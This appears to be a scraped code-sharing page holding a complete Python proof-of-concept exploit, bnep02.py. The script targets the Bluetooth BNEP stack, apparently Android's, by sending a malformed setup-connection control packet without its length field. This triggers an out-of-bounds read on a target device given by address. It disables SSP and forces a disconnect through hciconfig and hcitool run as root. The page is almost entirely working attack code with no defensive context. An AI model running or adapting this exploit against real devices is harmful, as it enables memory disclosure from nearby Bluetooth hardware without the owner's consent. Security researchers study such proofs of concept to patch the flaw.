扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 |
import os import sys import struct import bluetooth BNEP_PSM = 15 BNEP_FRAME_CONTROL = 0x01 # Control types (parsed by bnep_process_control_packet() in bnep_utils.cc) BNEP_SETUP_CONNECTION_REQUEST_MSG = 0x01 def oob_read(src_bdaddr, dst): bnep = bluetooth.BluetoothSocket(bluetooth.L2CAP) bnep.settimeout(5) bnep.bind((src_bdaddr, 0)) print 'Connecting to BNEP...' bnep.connect((dst, BNEP_PSM)) bnep.settimeout(1) print "Triggering OOB read (you may need a debugger to verify that it's actually happening)..." # This crafted BNEP packet just contains the BNEP_FRAME_CONTROL frame type, # plus the BNEP_SETUP_CONNECTION_REQUEST_MSG control type. # It doesn't include the 'len' field, therefore it is read from out of bounds bnep.send(struct.pack('<BB', BNEP_FRAME_CONTROL, BNEP_SETUP_CONNECTION_REQUEST_MSG)) try: data = bnep.recv(3) except bluetooth.btcommon.BluetoothError: data = '' if data: print '%r' % data else: print '[No data]' print 'Closing connection.' bnep.close() def main(src_hci, dst): os.system('hciconfig %s sspmode 0' % (src_hci,)) os.system('hcitool dc %s' % (dst,)) oob_read(src_hci, dst) if __name__ == '__main__': if len(sys.argv) < 3: print('Usage: python bnep02.py <src-bdaddr> <dst-bdaddr>') else: if os.getuid(): print 'Error: This script must be run as root.' else: main(sys.argv[1], sys.argv[2]) |
体验盒子
